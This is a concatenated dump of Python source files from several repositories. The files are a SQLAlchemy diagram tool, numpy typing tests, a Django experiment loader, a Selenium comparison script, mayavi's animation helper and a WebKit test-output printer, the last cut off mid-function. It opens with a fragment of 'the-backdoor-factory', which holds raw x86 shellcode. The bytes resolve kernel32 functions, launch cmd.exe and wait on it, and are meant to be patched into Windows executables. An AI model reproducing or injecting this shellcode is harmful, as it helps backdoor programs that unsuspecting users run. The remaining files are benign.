self.shellcode2 = ("\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
"\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
"\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
"\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
"\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
"\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
"\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
"\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
"\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
"\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x56\x46\x89\xD4"
"\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
| 0x0mar/the-backdoor-factory | intel/WinIntelPE32.py | Python | bsd-3-clause | 36,465 |
# -*- coding: utf-8 -*-
"""
Program for generating plantuml or dot output
for database tables, given a connection string
\n\nDatabase connection string - http://goo.gl/3GpnE
"""
import operator
from optparse import OptionParser
from sqlalchemy import create_engine, MetaData
from tsadisplay import describe, render, __version__
def run():
"""Command for reflection database objects"""
parser = OptionParser(
version=__version__, description=__doc__,
)
parser.add_option(
'-u', '--url', dest='url',
help='Database URL (connection string)',
)
parser.add_option(
'-r', '--render', dest='render', default='dot',
choices=['plantuml', 'dot'],
help='Output format - plantuml or dot',
)
parser.add_option(
'-l', '--list', dest='list', action='store_true',
help='Output database list of tables and exit',
)
parser.add_option(
'-i', '--include', dest='include',
help='List of tables to include through ","',
)
parser.add_option(
'-e', '--exclude', dest='exclude',
help='List of tables to exlude through ","',
)
(options, args) = parser.parse_args()
if not options.url:
print('-u/--url option required')
exit(1)
engine = create_engine(options.url)
meta = MetaData()
meta.reflect(bind=engine)
if options.list:
print('Database tables:')
tables = sorted(meta.tables.keys())
def _g(l, i):
try:
                return l[i]
except IndexError:
return ''
for i in range(0, len(tables), 2):
print(' {0}{1}{2}'.format(
_g(tables, i),
' ' * (38 - len(_g(tables, i))),
_g(tables, i + 1),
))
exit(0)
tables = set(meta.tables.keys())
if options.include:
tables &= set(map(string.strip, options.include.split(',')))
if options.exclude:
        tables -= set(map(str.strip, options.exclude.split(',')))
desc = describe(map(lambda x: operator.getitem(meta.tables, x), tables))
print(getattr(render, options.render)(desc))
| Equitable/trump | docs/diagrams/tsadisplay/reflect.py | Python | bsd-3-clause | 2,199 |
from __future__ import annotations
import re
import sys
from typing import Any, Callable, TypeVar
from pathlib import Path
import numpy as np
import numpy.typing as npt
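# Each reveal_type(...) expression below is checked by the typing test-suite
# against the expected type in the "# E: ..." comment on the same line.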
AR_f8: npt.NDArray[np.float64]
AR_i8: npt.NDArray[np.int64]
bool_obj: bool
suppress_obj: np.testing.suppress_warnings
FT = TypeVar("FT", bound=Callable[..., Any])
def func() -> int: ...
def func2(
x: npt.NDArray[np.number[Any]],
y: npt.NDArray[np.number[Any]],
) -> npt.NDArray[np.bool_]: ...
reveal_type(np.testing.KnownFailureException()) # E: KnownFailureException
reveal_type(np.testing.IgnoreException()) # E: IgnoreException
reveal_type(np.testing.clear_and_catch_warnings(modules=[np.testing])) # E: _clear_and_catch_warnings_without_records
reveal_type(np.testing.clear_and_catch_warnings(True)) # E: _clear_and_catch_warnings_with_records
reveal_type(np.testing.clear_and_catch_warnings(False)) # E: _clear_and_catch_warnings_without_records
reveal_type(np.testing.clear_and_catch_warnings(bool_obj)) # E: clear_and_catch_warnings
reveal_type(np.testing.clear_and_catch_warnings.class_modules) # E: tuple[types.ModuleType]
reveal_type(np.testing.clear_and_catch_warnings.modules) # E: set[types.ModuleType]
with np.testing.clear_and_catch_warnings(True) as c1:
reveal_type(c1) # E: builtins.list[warnings.WarningMessage]
with np.testing.clear_and_catch_warnings() as c2:
reveal_type(c2) # E: None
reveal_type(np.testing.suppress_warnings("once")) # E: suppress_warnings
reveal_type(np.testing.suppress_warnings()(func)) # E: def () -> builtins.int
reveal_type(suppress_obj.filter(RuntimeWarning)) # E: None
reveal_type(suppress_obj.record(RuntimeWarning)) # E: list[warnings.WarningMessage]
with suppress_obj as c3:
reveal_type(c3) # E: suppress_warnings
reveal_type(np.testing.verbose) # E: int
reveal_type(np.testing.IS_PYPY) # E: bool
reveal_type(np.testing.HAS_REFCOUNT) # E: bool
reveal_type(np.testing.HAS_LAPACK64) # E: bool
reveal_type(np.testing.assert_(1, msg="test")) # E: None
reveal_type(np.testing.assert_(2, msg=lambda: "test")) # E: None
if sys.platform == "win32" or sys.platform == "cygwin":
reveal_type(np.testing.memusage()) # E: builtins.int
elif sys.platform == "linux":
reveal_type(np.testing.memusage()) # E: Union[None, builtins.int]
else:
reveal_type(np.testing.memusage()) # E: <nothing>
reveal_type(np.testing.jiffies()) # E: builtins.int
reveal_type(np.testing.build_err_msg([0, 1, 2], "test")) # E: str
reveal_type(np.testing.build_err_msg(range(2), "test", header="header")) # E: str
reveal_type(np.testing.build_err_msg(np.arange(9).reshape(3, 3), "test", verbose=False)) # E: str
reveal_type(np.testing.build_err_msg("abc", "test", names=["x", "y"])) # E: str
reveal_type(np.testing.build_err_msg([1.0, 2.0], "test", precision=5)) # E: str
reveal_type(np.testing.assert_equal({1}, {1})) # E: None
reveal_type(np.testing.assert_equal([1, 2, 3], [1, 2, 3], err_msg="fail")) # E: None
reveal_type(np.testing.assert_equal(1, 1.0, verbose=True)) # E: None
reveal_type(np.testing.print_assert_equal('Test XYZ of func xyz', [0, 1], [0, 1])) # E: None
reveal_type(np.testing.assert_almost_equal(1.0, 1.1)) # E: None
reveal_type(np.testing.assert_almost_equal([1, 2, 3], [1, 2, 3], err_msg="fail")) # E: None
reveal_type(np.testing.assert_almost_equal(1, 1.0, verbose=True)) # E: None
reveal_type(np.testing.assert_almost_equal(1, 1.0001, decimal=2)) # E: None
reveal_type(np.testing.assert_approx_equal(1.0, 1.1)) # E: None
reveal_type(np.testing.assert_approx_equal("1", "2", err_msg="fail")) # E: None
reveal_type(np.testing.assert_approx_equal(1, 1.0, verbose=True)) # E: None
reveal_type(np.testing.assert_approx_equal(1, 1.0001, significant=2)) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, err_msg="test")) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, verbose=True)) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, header="header")) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, precision=np.int64())) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, equal_nan=False)) # E: None
reveal_type(np.testing.assert_array_compare(func2, AR_i8, AR_f8, equal_inf=True)) # E: None
reveal_type(np.testing.assert_array_equal(AR_i8, AR_f8)) # E: None
reveal_type(np.testing.assert_array_equal(AR_i8, AR_f8, err_msg="test")) # E: None
reveal_type(np.testing.assert_array_equal(AR_i8, AR_f8, verbose=True)) # E: None
reveal_type(np.testing.assert_array_almost_equal(AR_i8, AR_f8)) # E: None
reveal_type(np.testing.assert_array_almost_equal(AR_i8, AR_f8, err_msg="test")) # E: None
reveal_type(np.testing.assert_array_almost_equal(AR_i8, AR_f8, verbose=True)) # E: None
reveal_type(np.testing.assert_array_almost_equal(AR_i8, AR_f8, decimal=1)) # E: None
reveal_type(np.testing.assert_array_less(AR_i8, AR_f8)) # E: None
reveal_type(np.testing.assert_array_less(AR_i8, AR_f8, err_msg="test")) # E: None
reveal_type(np.testing.assert_array_less(AR_i8, AR_f8, verbose=True)) # E: None
reveal_type(np.testing.runstring("1 + 1", {})) # E: Any
reveal_type(np.testing.runstring("int64() + 1", {"int64": np.int64})) # E: Any
reveal_type(np.testing.assert_string_equal("1", "1")) # E: None
reveal_type(np.testing.rundocs()) # E: None
reveal_type(np.testing.rundocs("test.py")) # E: None
reveal_type(np.testing.rundocs(Path("test.py"), raise_on_error=True)) # E: None
@np.testing.raises(RuntimeError, RuntimeWarning)
def func3(a: int) -> bool: ...
reveal_type(func3) # E: def (a: builtins.int) -> builtins.bool
reveal_type(np.testing.assert_raises(RuntimeWarning)) # E: _AssertRaisesContext[builtins.RuntimeWarning]
reveal_type(np.testing.assert_raises(RuntimeWarning, func3, 5)) # E: None
reveal_type(np.testing.assert_raises_regex(RuntimeWarning, r"test")) # E: _AssertRaisesContext[builtins.RuntimeWarning]
reveal_type(np.testing.assert_raises_regex(RuntimeWarning, b"test", func3, 5)) # E: None
reveal_type(np.testing.assert_raises_regex(RuntimeWarning, re.compile(b"test"), func3, 5)) # E: None
class Test: ...
def decorate(a: FT) -> FT:
return a
reveal_type(np.testing.decorate_methods(Test, decorate)) # E: None
reveal_type(np.testing.decorate_methods(Test, decorate, None)) # E: None
reveal_type(np.testing.decorate_methods(Test, decorate, "test")) # E: None
reveal_type(np.testing.decorate_methods(Test, decorate, b"test")) # E: None
reveal_type(np.testing.decorate_methods(Test, decorate, re.compile("test"))) # E: None
reveal_type(np.testing.measure("for i in range(1000): np.sqrt(i**2)")) # E: float
reveal_type(np.testing.measure(b"for i in range(1000): np.sqrt(i**2)", times=5)) # E: float
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8)) # E: None
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8, rtol=0.005)) # E: None
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8, atol=1)) # E: None
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8, equal_nan=True)) # E: None
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8, err_msg="err")) # E: None
reveal_type(np.testing.assert_allclose(AR_i8, AR_f8, verbose=False)) # E: None
reveal_type(np.testing.assert_array_almost_equal_nulp(AR_i8, AR_f8, nulp=2)) # E: None
reveal_type(np.testing.assert_array_max_ulp(AR_i8, AR_f8, maxulp=2)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.testing.assert_array_max_ulp(AR_i8, AR_f8, dtype=np.float32)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.testing.assert_warns(RuntimeWarning)) # E: _GeneratorContextManager[None]
reveal_type(np.testing.assert_warns(RuntimeWarning, func3, 5)) # E: bool
reveal_type(np.testing.assert_no_warnings()) # E: _GeneratorContextManager[None]
reveal_type(np.testing.assert_no_warnings(func3, 5)) # E: bool
reveal_type(np.testing.tempdir("test_dir")) # E: _GeneratorContextManager[builtins.str]
reveal_type(np.testing.tempdir(prefix=b"test")) # E: _GeneratorContextManager[builtins.bytes]
reveal_type(np.testing.tempdir("test_dir", dir=Path("here"))) # E: _GeneratorContextManager[builtins.str]
reveal_type(np.testing.temppath("test_dir", text=True)) # E: _GeneratorContextManager[builtins.str]
reveal_type(np.testing.temppath(prefix=b"test")) # E: _GeneratorContextManager[builtins.bytes]
reveal_type(np.testing.temppath("test_dir", dir=Path("here"))) # E: _GeneratorContextManager[builtins.str]
reveal_type(np.testing.assert_no_gc_cycles()) # E: _GeneratorContextManager[None]
reveal_type(np.testing.assert_no_gc_cycles(func3, 5)) # E: None
reveal_type(np.testing.break_cycles()) # E: None
reveal_type(np.testing.TestCase()) # E: unittest.case.TestCase
reveal_type(np.testing.run_module_suite(file_to_run="numpy/tests/test_matlib.py")) # E: None
| simongibbons/numpy | numpy/typing/tests/data/reveal/testing.py | Python | bsd-3-clause | 8,824 |
# -*- coding: utf-8 -*-
import logging, os, sys
l = logging.getLogger(__name__)
from django.conf import settings
import json
from django_lean.experiments.models import Experiment
class ExperimentLoader(object):
"""
    Loads the experiments from a file containing a list of experiments.
    It will add new experiments, but will not touch existing experiments.
"""
NAME_ATTRIBUTE="name"
ALLOWED_ATTRIBUTES=[NAME_ATTRIBUTE]
APPLICATION_RELATIVE_EXPERIMENT_FILE = "%sexperiments.json" % os.sep
__loaded = False
@classmethod
def load_all_experiments(cls, apps=settings.INSTALLED_APPS):
"""
Loads experiments for all applications in settings.INSTALLED_APPS
"""
if not cls.__loaded:
cls.__loaded = True
for app_name in apps:
application_path = os.path.dirname(sys.modules[app_name].__file__)
application_experiment_file_path = (
application_path +
ExperimentLoader.APPLICATION_RELATIVE_EXPERIMENT_FILE)
if os.access(application_experiment_file_path, os.F_OK):
ExperimentLoader.load_experiments(application_experiment_file_path)
@staticmethod
def load_experiments(filename):
"""
Will load the data from the filename, expected data format to be
JSON : [{ name : "name" }]
"""
fp = open(filename)
experiment_names = None
try:
experiment_names = json.load(fp)
except Exception as e:
l.error("Unable to parse experiment file %s: %s" % (filename, e))
raise e
finally:
fp.close()
for entry in experiment_names:
for key in entry.keys():
if key not in ExperimentLoader.ALLOWED_ATTRIBUTES:
l.warning("Ignoring unrecognized key %s on experiment "
"definition %s in filename %s" %
(key, entry, filename))
if ExperimentLoader.NAME_ATTRIBUTE in entry:
Experiment.objects.get_or_create(
name=entry.get(ExperimentLoader.NAME_ATTRIBUTE))
else:
l.warning("Invalid entry in experiment file %s : %s" %
(filename, entry))
| uhuramedia/django-lean | django_lean/experiments/loader.py | Python | bsd-3-clause | 2,347 |
import sys
import requests
try:
from .helper import *
except SystemError:
from helper import *
def compareRequestsAndSelenium(url):
html1 = str(requests.get(url).text)
    # Bind the driver before the try block so it is always defined when
    # the finally clause runs.
    driver = webdriver.Firefox()
    try:
        driver.maximize_window()
        driver.get(url)
        html2 = str(driver.page_source)
    finally:
        driver.close()
view_diff(url, html1, html2)
# url = 'http://www.healthgrades.com/physician/dr-jeannine-villella-y4jts'
# compareRequestsAndSelenium(url)
# url = 'https://www.betterdoctor.com/wendy-tcheng'
# compareRequestsAndSelenium(url)
if __name__ == '__main__':
compareRequestsAndSelenium(sys.argv[1])
| bgarrels/sky | sky/legacy/comparison.py | Python | bsd-3-clause | 685 |
"""
Simple utility code for animations.
"""
# Author: Prabhu Ramachandran <prabhu at aerodotiitbdotacdotin>
# Copyright (c) 2009, Enthought, Inc.
# License: BSD Style.
import types
from functools import wraps
try:
from decorator import decorator
HAS_DECORATOR = True
except ImportError:
HAS_DECORATOR = False
from pyface.timer.api import Timer
from traits.api import HasTraits, Button, Instance, Range
from traitsui.api import View, Group, Item
###############################################################################
# `Animator` class.
###############################################################################
class Animator(HasTraits):
""" Convenience class to manage a timer and present a convenient
UI. This is based on the code in `tvtk.tools.visual`.
Here is a simple example of using this class::
>>> from mayavi import mlab
>>> def anim():
... f = mlab.gcf()
... while 1:
... f.scene.camera.azimuth(10)
... f.scene.render()
... yield
...
>>> anim = anim()
>>> t = Animator(500, anim.next)
>>> t.edit_traits()
This makes it very easy to animate your visualizations and control
it from a simple UI.
**Notes**
If you want to modify the data plotted by an `mlab` function call,
please refer to the section on: :ref:`mlab-animating-data`
"""
########################################
# Traits.
start = Button('Start Animation')
stop = Button('Stop Animation')
delay = Range(10, 100000, 500,
desc='frequency with which timer is called')
# The internal timer we manage.
timer = Instance(Timer)
######################################################################
# User interface view
traits_view = View(Group(Item('start'),
Item('stop'),
show_labels=False),
Item('_'),
Item(name='delay'),
title='Animation Controller',
buttons=['OK'])
######################################################################
# Initialize object
def __init__(self, millisec, callable, *args, **kwargs):
"""Constructor.
**Parameters**
:millisec: int specifying the delay in milliseconds
between calls to the callable.
:callable: callable function to call after the specified
delay.
:\*args: optional arguments to be passed to the callable.
:\*\*kwargs: optional keyword arguments to be passed to the callable.
"""
HasTraits.__init__(self)
self.delay = millisec
self.ui = None
self.timer = Timer(millisec, callable, *args, **kwargs)
######################################################################
# `Animator` protocol.
######################################################################
def show(self):
"""Show the animator UI.
"""
self.ui = self.edit_traits()
def close(self):
"""Close the animator UI.
"""
if self.ui is not None:
self.ui.dispose()
######################################################################
# Non-public methods, Event handlers
def _start_fired(self):
self.timer.Start(self.delay)
def _stop_fired(self):
self.timer.Stop()
def _delay_changed(self, value):
t = self.timer
if t is None:
return
if t.IsRunning():
t.Stop()
t.Start(value)
###############################################################################
# Decorators.
def animate(func=None, delay=500, ui=True):
""" A convenient decorator to animate a generator that performs an
animation. The `delay` parameter specifies the delay (in
milliseconds) between calls to the decorated function. If `ui` is
True, then a simple UI for the animator is also popped up. The
decorated function will return the `Animator` instance used and a
user may call its `Stop` method to stop the animation.
If an ordinary function is decorated a `TypeError` will be raised.
**Parameters**
:delay: int specifying the time interval in milliseconds between
calls to the function.
:ui: bool specifying if a UI controlling the animation is to be
provided.
**Returns**
The decorated function returns an `Animator` instance.
**Examples**
Here is the example provided in the Animator class documentation::
>>> from mayavi import mlab
>>> @mlab.animate
... def anim():
... f = mlab.gcf()
... while 1:
... f.scene.camera.azimuth(10)
... f.scene.render()
... yield
...
>>> a = anim() # Starts the animation.
For more specialized use you can pass arguments to the decorator::
>>> from mayavi import mlab
>>> @mlab.animate(delay=500, ui=False)
... def anim():
... f = mlab.gcf()
... while 1:
... f.scene.camera.azimuth(10)
... f.scene.render()
... yield
...
>>> a = anim() # Starts the animation without a UI.
**Notes**
If you want to modify the data plotted by an `mlab` function call,
please refer to the section on: :ref:`mlab-animating-data`.
"""
class Wrapper(object):
# The wrapper which calls the decorated function.
def __init__(self, function):
self.func = function
self.ui = ui
self.delay = delay
def __call__(self, *args, **kw):
if isinstance(self.func, types.GeneratorType):
f = self.func
else:
f = self.func(*args, **kw)
if isinstance(f, types.GeneratorType):
a = Animator(self.delay, f.next)
if self.ui:
a.show()
return a
else:
msg = 'The function "%s" must be a generator '\
'(use yield)!' % (self.func.__name__)
raise TypeError(msg)
def decorator_call(self, func, *args, **kw):
return self(*args, **kw)
def _wrapper(function):
# Needed to create the Wrapper in the right scope.
if HAS_DECORATOR:
# The decorator calls a callable with (func, *args, **kw) signature
return decorator(Wrapper(function).decorator_call, function)
else:
return wraps(function)(Wrapper(function))
if func is None:
return _wrapper
else:
return _wrapper(func)
| liulion/mayavi | mayavi/tools/animator.py | Python | bsd-3-clause | 7,087 |
# Copyright (C) 2010, 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Package that handles non-debug, non-file output for run-webkit-tests."""
import math
import optparse
from webkitpy.tool import grammar
from webkitpy.layout_tests.models import test_expectations
from webkitpy.layout_tests.models.test_expectations import TestExpectations, TestExpectationParser
from webkitpy.layout_tests.views.metered_stream import MeteredStream
NUM_SLOW_TESTS_TO_LOG = 10
def print_options():
return [
optparse.make_option('--debug-rwt-logging', action='store_true', default=False,
help='print timestamps and debug information for run-webkit-tests itself'),
optparse.make_option('--details', action='store_true', default=False,
help='print detailed results for every test'),
optparse.make_option('-q', '--quiet', action='store_true', default=False,
help='run quietly (errors, warnings, and progress only)'),
optparse.make_option('--timing', action='store_true', default=False,
help='display test times (summary plus per-test w/ --verbose)'),
optparse.make_option('-v', '--verbose', action='store_true', default=False,
help='print a summarized result for every test (one line per test)'),
]
class Printer(object):
"""Class handling all non-debug-logging printing done by run-webkit-tests."""
def __init__(self, port, options, regular_output, logger=None):
self.num_completed = 0
self.num_tests = 0
self._port = port
self._options = options
self._meter = MeteredStream(regular_output, options.debug_rwt_logging, logger=logger,
number_of_columns=self._port.host.platform.terminal_width())
self._running_tests = []
self._completed_tests = []
def cleanup(self):
self._meter.cleanup()
def __del__(self):
self.cleanup()
def print_config(self, results_directory):
self._print_default("Using port '%s'" % self._port.name())
self._print_default("Test configuration: %s" % self._port.test_configuration())
self._print_default("View the test results at file://%s/results.html" % results_directory)
if self._options.enable_versioned_results:
self._print_default("View the archived results dashboard at file://%s/dashboard.html" % results_directory)
# FIXME: should these options be in printing_options?
if self._options.new_baseline:
self._print_default("Placing new baselines in %s" % self._port.baseline_path())
fs = self._port.host.filesystem
fallback_path = [fs.split(x)[1] for x in self._port.baseline_search_path()]
self._print_default("Baseline search path: %s -> generic" % " -> ".join(fallback_path))
self._print_default("Using %s build" % self._options.configuration)
if self._options.pixel_tests:
self._print_default("Pixel tests enabled")
else:
self._print_default("Pixel tests disabled")
self._print_default("Regular timeout: %s, slow test timeout: %s" %
(self._options.time_out_ms, self._options.slow_time_out_ms))
self._print_default('Command line: ' + ' '.join(self._port.driver_cmd_line()))
self._print_default('')
def print_found(self, num_all_test_files, num_to_run, repeat_each, iterations):
found_str = 'Found %s; running %d' % (grammar.pluralize('test', num_all_test_files), num_to_run)
if repeat_each * iterations > 1:
found_str += ' (%d times each: --repeat-each=%d --iterations=%d)' % (repeat_each * iterations, repeat_each, iterations)
found_str += ', skipping %d' % (num_all_test_files - num_to_run)
self._print_default(found_str + '.')
def print_expected(self, run_results, tests_with_result_type_callback):
self._print_expected_results_of_type(run_results, test_expectations.PASS, "passes", tests_with_result_type_callback)
self._print_expected_results_of_type(run_results, test_expectations.FAIL, "failures", tests_with_result_type_callback)
self._print_expected_results_of_type(run_results, test_expectations.FLAKY, "flaky", tests_with_result_type_callback)
self._print_debug('')
def print_workers_and_shards(self, num_workers, num_shards, num_locked_shards):
driver_name = self._port.driver_name()
if num_workers == 1:
self._print_default("Running 1 %s." % driver_name)
self._print_debug("(%s)." % grammar.pluralize('shard', num_shards))
else:
self._print_default("Running %d %ss in parallel." % (num_workers, driver_name))
self._print_debug("(%d shards; %d locked)." % (num_shards, num_locked_shards))
self._print_default('')
def _print_expected_results_of_type(self, run_results, result_type, result_type_str, tests_with_result_type_callback):
tests = tests_with_result_type_callback(result_type)
now = run_results.tests_by_timeline[test_expectations.NOW]
wontfix = run_results.tests_by_timeline[test_expectations.WONTFIX]
# We use a fancy format string in order to print the data out in a
# nicely-aligned table.
fmtstr = ("Expect: %%5d %%-8s (%%%dd now, %%%dd wontfix)"
% (self._num_digits(now), self._num_digits(wontfix)))
self._print_debug(fmtstr % (len(tests), result_type_str, len(tests & now), len(tests & wontfix)))
def _num_digits(self, num):
ndigits = 1
if len(num):
ndigits = int(math.log10(len(num))) + 1
return ndigits
def print_results(self, run_time, run_results, summarized_results):
self._print_timing_statistics(run_time, run_results)
self._print_one_line_summary(run_time, run_results)
def _print_timing_statistics(self, total_time, run_results):
self._print_debug("Test timing:")
self._print_debug(" %6.2f total testing time" % total_time)
self._print_debug("")
self._print_worker_statistics(run_results, int(self._options.child_processes))
self._print_aggregate_test_statistics(run_results)
self._print_individual_test_times(run_results)
self._print_directory_timings(run_results)
def _print_worker_statistics(self, run_results, num_workers):
self._print_debug("Thread timing:")
stats = {}
cuml_time = 0
for result in run_results.results_by_name.values():
stats.setdefault(result.worker_name, {'num_tests': 0, 'total_time': 0})
stats[result.worker_name]['num_tests'] += 1
stats[result.worker_name]['total_time'] += result.total_run_time
cuml_time += result.total_run_time
for worker_name in stats:
self._print_debug(" %10s: %5d tests, %6.2f secs" % (worker_name, stats[worker_name]['num_tests'], stats[worker_name]['total_time']))
self._print_debug(" %6.2f cumulative, %6.2f optimal" % (cuml_time, cuml_time / num_workers))
self._print_debug("")
def _print_aggregate_test_statistics(self, run_results):
times_for_dump_render_tree = [result.test_run_time for result in run_results.results_by_name.values()]
self._print_statistics_for_test_timings("PER TEST TIME IN TESTSHELL (seconds):", times_for_dump_render_tree)
def _print_individual_test_times(self, run_results):
# Reverse-sort by the time spent in the driver.
individual_test_timings = sorted(run_results.results_by_name.values(), key=lambda result: result.test_run_time, reverse=True)
num_printed = 0
slow_tests = []
timeout_or_crash_tests = []
unexpected_slow_tests = []
for test_tuple in individual_test_timings:
test_name = test_tuple.test_name
is_timeout_crash_or_slow = False
if test_name in run_results.slow_tests:
is_timeout_crash_or_slow = True
slow_tests.append(test_tuple)
if test_name in run_results.failures_by_name:
result = run_results.results_by_name[test_name].type
if (result == test_expectations.TIMEOUT or
result == test_expectations.CRASH):
is_timeout_crash_or_slow = True
timeout_or_crash_tests.append(test_tuple)
if (not is_timeout_crash_or_slow and num_printed < NUM_SLOW_TESTS_TO_LOG):
num_printed = num_printed + 1
unexpected_slow_tests.append(test_tuple)
self._print_debug("")
if unexpected_slow_tests:
self._print_test_list_timing("%s slowest tests that are not marked as SLOW and did not timeout/crash:" %
NUM_SLOW_TESTS_TO_LOG, unexpected_slow_tests)
self._print_debug("")
if slow_tests:
self._print_test_list_timing("Tests marked as SLOW:", slow_tests)
self._print_debug("")
if timeout_or_crash_tests:
self._print_test_list_timing("Tests that timed out or crashed:", timeout_or_crash_tests)
self._print_debug("")
def _print_test_list_timing(self, title, test_list):
self._print_debug(title)
for test_tuple in test_list:
test_run_time = round(test_tuple.test_run_time, 1)
self._print_debug(" %s took %s seconds" % (test_tuple.test_name, test_run_time))
def _print_directory_timings(self, run_results):
stats = {}
for result in run_results.results_by_name.values():
stats.setdefault(result.shard_name, {'num_tests': 0, 'total_time': 0})
stats[result.shard_name]['num_tests'] += 1
stats[result.shard_name]['total_time'] += result.total_run_time
min_seconds_to_print = 15
timings = []
for directory in stats:
rounded_time = round(stats[directory]['total_time'], 1)
if rounded_time > min_seconds_to_print:
timings.append((directory, rounded_time, stats[directory]['num_tests']))
if not timings:
return
timings.sort()
self._print_debug("Time to process slowest subdirectories:")
for timing in timings:
self._print_debug(" %s took %s seconds to run %s tests." % timing)
self._print_debug("")
def _print_statistics_for_test_timings(self, title, timings):
self._print_debug(title)
timings.sort()
num_tests = len(timings)
if not num_tests:
return
percentile90 = timings[int(.9 * num_tests)]
percentile99 = timings[int(.99 * num_tests)]
        if num_tests % 2 == 1:
            median = timings[(num_tests - 1) / 2]
else:
lower = timings[num_tests / 2 - 1]
upper = timings[num_tests / 2]
median = (float(lower + upper)) / 2
mean = sum(timings) / num_tests
        sum_of_deviations = sum(math.pow(timing - mean, 2) for timing in timings)
        std_deviation = math.sqrt(sum_of_deviations / num_tests)
self._print_debug(" Median: %6.3f" % median)
self._print_debug(" Mean: %6.3f" % mean)
self._print_debug(" 90th percentile: %6.3f" % percentile90)
self._print_debug(" 99th percentile: %6.3f" % percentile99)
self._print_debug(" Standard dev: %6.3f" % std_deviation)
self._print_debug("")
def _print_one_line_summary(self, total_time, run_results):
if self._options.timing:
parallel_time = sum(result.total_run_time for result in run_results.results_by_name.values())
# There is serial overhead in layout_test_runner.run() that we can't easily account for when
# really running in parallel, but taking the min() ensures that in the worst case
# (if parallel time is less than run_time) we do account for it.
serial_time = total_time - min(run_results.run_time, parallel_time)
speedup = (parallel_time + serial_time) / total_time
timing_summary = ' in %.2fs (%.2fs in rwt, %.2gx)' % (total_time, serial_time, speedup)
else:
timing_summary = ''
total = run_results.total - run_results.expected_skips
expected = run_results.expected - run_results.expected_skips
unexpected = run_results.unexpected
incomplete = total - expected - unexpected
incomplete_str = ''
if incomplete:
self._print_default("")
incomplete_str = " (%d didn't run)" % incomplete
if self._options.verbose or self._options.debug_rwt_logging or unexpected:
self.writeln("")
expected_summary_str = ''
if run_results.expected_failures > 0:
expected_summary_str = " (%d passed, %d didn't)" % (expected - run_results.expected_failures, run_results.expected_failures)
summary = ''
if unexpected == 0:
if expected == total:
if expected > 1:
summary = "All %d tests ran as expected%s%s." % (expected, expected_summary_str, timing_summary)
else:
summary = "The test ran as expected%s%s." % (expected_summary_str, timing_summary)
else:
summary = "%s ran as expected%s%s%s." % (grammar.pluralize('test', expected), expected_summary_str, incomplete_str, timing_summary)
else:
summary = "%s ran as expected%s, %d didn't%s%s:" % (grammar.pluralize('test', expected), expected_summary_str, unexpected, incomplete_str, timing_summary)
self._print_quiet(summary)
self._print_quiet("")
def _test_status_line(self, test_name, suffix):
format_string = '[%d/%d] %s%s'
status_line = format_string % (self.num_completed, self.num_tests, test_name, suffix)
if len(status_line) > self._meter.number_of_columns():
overflow_columns = len(status_line) - self._meter.number_of_columns()
ellipsis = '...'
if len(test_name) < overflow_columns + len(ellipsis) + 2:
# We don't have enough space even if we elide, just show the test filename.
fs = self._port.host.filesystem
test_name = fs.split(test_name)[1]
else:
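                # Keep the head and tail of the name and elide the middle so
                # the status line still fits the terminal width.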
new_length = len(test_name) - overflow_columns - len(ellipsis)
prefix = int(new_length / 2)
